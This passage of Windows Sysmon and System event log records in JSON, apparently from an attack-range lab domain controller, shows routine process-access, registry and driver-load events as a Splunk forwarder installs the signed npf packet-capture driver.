{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3777,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.925\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.925","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3778,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.925\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.925","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3779,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.925\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.925","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3780,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.925\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FFB-5F25-0000-0010E0B80500}\r\nTargetProcessId: 3060\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.925","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FFB-5F25-0000-0010E0B80500}","TargetProcessId":"3060","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3781,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.925\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FFB-5F25-0000-0010E0B80500}\r\nTargetProcessId: 3060\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.925","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FFB-5F25-0000-0010E0B80500}","TargetProcessId":"3060","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7045,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76856,"ProcessID":856,"ThreadID":948,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"A service was installed in the system.\r\n\r\nService Name:  npf\r\nService File Name:  C:/Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys\r\nService Type:  kernel mode driver\r\nService Start Type:  demand start\r\nService Account:  ","ServiceName":"npf","ImagePath":"C:/Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys","ServiceType":"kernel mode driver","StartType":"demand start","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":3782,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:55:40.425\r\nProcessGuid: {41C8662E-1F61-5F25-0000-00102F530000}\r\nProcessId: 856\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\npf\\Start\r\nDetails: DWORD (0x00000003)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"T1031,T1050","UtcTime":"2020-08-01 07:55:40.425","ProcessGuid":"{41C8662E-1F61-5F25-0000-00102F530000}","Image":"C:\\Windows\\system32\\services.exe","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\npf\\Start","Details":"DWORD (0x00000003)","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":3783,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:55:40.425\r\nProcessGuid: {41C8662E-1F61-5F25-0000-00102F530000}\r\nProcessId: 856\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\npf\\ImagePath\r\nDetails: \\??\\C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"T1031,T1050","UtcTime":"2020-08-01 07:55:40.425","ProcessGuid":"{41C8662E-1F61-5F25-0000-00102F530000}","Image":"C:\\Windows\\system32\\services.exe","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\npf\\ImagePath","Details":"\\??\\C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3784,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:40.425\r\nSourceProcessGUID: {41C8662E-1FFB-5F25-0000-0010E3B20500}\r\nSourceProcessId: 3916\r\nSourceThreadId: 4524\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe+201f2b|C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe+a6c153|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:40.425","SourceProcessGUID":"{41C8662E-1FFB-5F25-0000-0010E3B20500}","SourceProcessId":"3916","SourceThreadId":"4524","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe+201f2b|C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe+a6c153|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3785,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:40.519\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nSourceProcessId: 1312\r\nSourceThreadId: 1556\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\cryptsvc.dll+6124|c:\\windows\\system32\\cryptsvc.dll+5e34|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:40.519","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","SourceProcessId":"1312","SourceThreadId":"1556","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\cryptsvc.dll+6124|c:\\windows\\system32\\cryptsvc.dll+5e34|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":6,"OpcodeValue":0,"RecordNumber":3786,"ProcessID":2804,"ThreadID":3364,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Driver loaded:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:40.425\r\nImageLoaded: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys\r\nHashes: MD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6,IMPHASH=CB86059F4B291991E735BECBD4C669CB\r\nSigned: true\r\nSignature: Riverbed Technology, Inc.\r\nSignatureStatus: Valid","Category":"Driver loaded (rule: DriverLoad)","Opcode":"Info","UtcTime":"2020-08-01 07:55:40.425","ImageLoaded":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys","Hashes":"MD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6,IMPHASH=CB86059F4B291991E735BECBD4C669CB","Signed":"true","Signature":"Riverbed Technology, Inc.","SignatureStatus":"Valid","EventReceivedTime":"2020-08-01 